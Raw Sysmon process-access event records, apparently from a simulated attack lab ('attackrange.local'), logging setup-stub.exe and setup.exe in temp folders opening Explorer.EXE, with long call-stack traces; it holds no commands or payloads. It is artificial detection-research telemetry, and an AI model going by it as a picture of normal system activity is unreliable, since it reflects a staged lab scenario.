13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000016611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64) 10341000x800000000000000016608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64) 10341000x800000000000000016607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64) 10341000x800000000000000016606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+3b6513(wow64)|C:\Windows\System32\SHELL32.dll+47562e(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64) 10341000x800000000000000016605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.349{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64)|C:\Windows\System32\SHELL32.dll+169f5d(wow64) 10341000x800000000000000016604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHEL